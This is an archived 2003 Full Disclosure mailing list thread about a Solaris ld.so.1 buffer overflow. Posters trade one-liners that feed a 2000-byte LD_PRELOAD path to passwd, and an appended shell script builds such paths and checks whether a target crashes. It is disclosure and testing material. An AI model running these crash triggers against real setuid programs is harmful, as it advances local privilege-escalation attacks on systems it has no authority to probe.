Full Disclosure mailing list archives

RE: Re: Fwd: Re: Solaris ld.so.1 buffer overflow


From: "Schmehl, Paul L" <pauls () utdallas edu>
Date: Thu, 31 Jul 2003 10:08:15 -0500

-----Original Message-----
From: Jim Dew [mailto:jdew () yggdrasil ca] 
Sent: Wednesday, July 30, 2003 8:19 PM
To: Jouko Pynnonen
Cc: full-disclosure () lists netsys com
Subject: [Full-disclosure] Re: Fwd: Re: Solaris ld.so.1 buffer overflow


On Wed, Jul 30, 2003 at 07:49:28PM +0300, Jouko Pynnonen wrote:

On Wed, Jul 30, 2003 at 12:37:44PM -0400, Rukshin, David wrote:
Modify the command (you need to add a trailing slash) to be the following:

LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd

and try it again.


This segfaults on Solaris 2.6.

Try moving the escape to *before* the backtick:
LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd

Paul Schmehl (pauls () utdallas edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/ 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
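The disagreement in this thread is mostly about shell quoting: whether the trailing slash and the backtick-expanded perl output end up in LD_PRELOAD the way the poster intended. The script below is an added example, not code from any of the posters. It builds the oversized path inside the shell (no backticks, no perl), runs the target with it, and reports whether the target died with SIGSEGV. The function names make_long_path and probe_ld_preload are my own; it assumes a POSIX shell that reports death by signal as 128 plus the signal number (SIGSEGV is 139) and an executable target path. The trailing slash can be switched on or off so both variants from the thread can be tried side by side.

```shell
#!/bin/sh
# Added example (not from the thread). Builds an oversized LD_PRELOAD
# path in the shell itself, so backtick/quoting problems cannot creep in,
# runs the target with it and reports whether the target was killed by
# SIGSEGV.
# Assumptions (mine): the shell reports signal death as 128+signo
# (SIGSEGV -> 139) and the target path exists and is executable.

# make_long_path LEN [SUFFIX]: print "/" + LEN bytes of 'A' + SUFFIX.
# SUFFIX defaults to "/" (the trailing-slash variant suggested in the
# thread); pass "" to get the form without it.
make_long_path() {
    len=$1
    suffix=${2-/}
    # printf pads to LEN spaces; tr turns each space into the filler byte.
    printf '/%s%s' "$(printf "%${len}s" '' | tr ' ' 'A')" "$suffix"
}

# probe_ld_preload TARGET [LEN] [SUFFIX]
# Runs TARGET with LD_PRELOAD set to the long path.
# Returns 0 if TARGET was killed by SIGSEGV, 1 if it survived,
# 2 if TARGET is not executable; prints a one-line verdict.
probe_ld_preload() {
    target=$1
    len=${2:-2000}
    path=$(make_long_path "$len" "${3-/}")
    [ -x "$target" ] || { echo "not executable: $target"; return 2; }
    # env exec()s the target directly, so its exit status comes back
    # unchanged; stdin is /dev/null so an interactive target cannot block.
    env LD_PRELOAD="$path" "$target" >/dev/null 2>&1 </dev/null
    rc=$?
    case $rc in
        139) echo "SIGSEGV: $target crashed with a ${#path}-byte LD_PRELOAD"
             return 0 ;;
        *)   echo "exit $rc: $target survived a ${#path}-byte LD_PRELOAD"
             return 1 ;;
    esac
}

# Usage: sh probe.sh /usr/bin/passwd 2000 /      (with trailing slash)
#        sh probe.sh /usr/bin/passwd 2000 ''     (without it)
if [ $# -gt 0 ]; then
    probe_ld_preload "$@"
fi
```

On a Linux box with glibc or musl the loader simply reports that the object cannot be preloaded and continues, so the probe prints "survived"; the script is only a clean way to reproduce the Solaris observation above without the backtick ambiguity, and to vary the length and the trailing slash from the command line.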